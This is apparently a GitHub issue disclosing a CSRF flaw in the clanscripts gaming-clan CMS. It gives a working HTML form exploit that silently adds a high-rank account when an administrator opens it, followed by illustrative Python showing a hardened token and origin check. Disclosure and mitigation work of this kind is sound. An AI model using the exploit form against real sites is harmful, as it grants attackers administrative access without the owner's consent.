bluethrust / clanscripts

A CMS built for Clans, Guilds and Gaming Communities
http://www.bluethrust.com

There is one CSRF vulnerability that can add a High Rank account #27

Open rebootORZ opened 5 years ago

rebootORZ commented 5 years ago

After the administrator has logged in, opening the following page, one.html, adds a High Rank account.

```html
<!DOCTYPE html>
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/members/console.php?cID=5" method="POST">
      <input type="hidden" name="newmember" value="test2" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="set&#95;rank" value="41" />
      <input type="hidden" name="submit" value="Add&#32;New&#32;Member" />
      <input type="hidden" name="checkCSRF" value="034afa58abf045d046ce7dba7b1b125e" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
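The PoC works because the hard-coded `checkCSRF` value is accepted for any admin session. The server-side check a defender would want is shown below as an added example in Python; it is not clanscripts code, and the session dict, `handle_add_member` model of the `console.php?cID=5` "Add New Member" action and the `http://evil.example` origin are assumptions. It binds the token to the issuing session, compares it in constant time, rotates it after use, and refuses the fixed token from the form above.

```python
import hmac
import secrets

# Field names are taken from the PoC form; the handler, session dict and
# origins are constructed for illustration and are not clanscripts code.


def issue_csrf_token(session: dict) -> str:
    """Create a fresh per-session token and remember it server-side."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: dict, submitted) -> bool:
    """Accept only the token issued to *this* session, compared in constant time."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False  # no form was ever rendered to this session
    return hmac.compare_digest(expected, submitted)


def origin_allowed(headers: dict, site_origin: str) -> bool:
    """Secondary gate: a cross-site POST carries the attacker's Origin/Referer."""
    origin = headers.get("Origin") or headers.get("Referer", "")
    return origin.startswith(site_origin)


def handle_add_member(session: dict, form: dict, headers: dict,
                      site_origin: str = "http://127.0.0.1") -> dict:
    """Model of the 'Add New Member' action with a hardened CSRF gate."""
    if not session.get("is_admin"):
        return {"status": 403, "added": None, "reason": "not admin"}
    if not csrf_token_valid(session, form.get("checkCSRF")):
        return {"status": 403, "added": None, "reason": "bad csrf token"}
    if not origin_allowed(headers, site_origin):
        return {"status": 403, "added": None, "reason": "cross-site origin"}
    if form.get("password") != form.get("password2"):
        return {"status": 400, "added": None, "reason": "password mismatch"}
    issue_csrf_token(session)  # rotate so a captured token cannot be replayed
    return {"status": 200, "added": {"name": form["newmember"], "rank": int(form["set_rank"])}}


def demo():
    admin = {"is_admin": True}
    forged = {"newmember": "test2", "password": "123456", "password2": "123456",
              "set_rank": "41", "submit": "Add New Member",
              "checkCSRF": "034afa58abf045d046ce7dba7b1b125e"}  # fixed value from PoC
    forged_result = handle_add_member(admin, forged, {"Origin": "http://evil.example"})
    legit = dict(forged, checkCSRF=issue_csrf_token(admin))  # token rendered into admin's form
    legit_result = handle_add_member(admin, legit, {"Origin": "http://127.0.0.1"})
    replay_result = handle_add_member(admin, legit, {"Origin": "http://127.0.0.1"})
    return forged_result, legit_result, replay_result
```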